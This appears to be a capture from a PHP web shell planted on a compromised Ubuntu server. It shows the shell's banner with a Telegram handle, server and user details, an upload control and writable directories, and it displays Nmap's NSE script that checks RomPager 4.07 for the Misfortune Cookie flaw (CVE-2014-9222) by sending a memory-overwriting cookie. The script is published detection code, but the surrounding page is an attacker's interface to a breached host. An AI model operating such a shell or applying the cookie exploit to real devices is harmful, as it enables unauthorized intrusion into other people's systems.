https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/nmap/scripts/http-vuln-misfortune-cookie.nse
description = [[Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.]]

author = "Andrew Orr"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}

---
-- @usage
-- nmap <target> -p 7547 --script=http-vuln-misfortune-cookie
--
-- @output
-- PORT   STATE SERVICE REASON
-- 7547/tcp open  unknown syn-ack
-- | http-vuln-misfortune-cookie:
-- |   VULNERABLE:
-- |   RomPager 4.07 Misfortune Cookie
-- |     State: VULNERABLE
-- |     IDs:  BID:71744  CVE:CVE-2014-9222
-- |     Description:
-- | The cookie handling routines in RomPager 4.07 are vulnerable to remote code
-- | execution. This script has verified the vulnerability by exploiting the web
-- | server in a safe manner.
-- |     References:
-- |       http://www.kb.cert.org/vuls/id/561444
-- |       http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
-- |       http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
-- |_      http://www.securityfocus.com/bid/71744

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"

portrule = shortport.port_or_service(7547, "http")

-- This memory address overwrites the request URI.
-- Other addresses may have other effects, some harmful.
local MAGIC_COOKIE = "C107373883"

local function vuln_to_misfortune_cookie(host, port)
  local request_path = "/nmap_test"
  local options = { cookies = MAGIC_COOKIE .. "=" .. request_path }
  local flag = request_path .. "' was not found on the RomPager server."
  local req = http.get(host, port, "/", options)
  if not(http.response_contains(req, flag)) then
    return false
  end
  return true
end

action = function(host, port)
  local vuln = {
    title = "RomPager 4.07 Misfortune Cookie",
    state = vulns.STATE.NOT_VULN,
    IDS = { CVE = 'CVE-2014-9222', BID = '71744' },
    description = [[
The cookie handling routines in RomPager 4.07 are vulnerable to remote code
execution. This script has verified the vulnerability by exploiting the web
server in a safe manner.]],
    references = {
      "http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html",
      "http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf",
      "http://www.kb.cert.org/vuls/id/561444"
    }
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  if vuln_to_misfortune_cookie(host, port) then
    vuln.state = vulns.STATE.VULN
  else
    vuln.state = vulns.STATE.NOT_VULN
  end

  return report:make_output(vuln)
end

https://t.me/RX1948 - 2025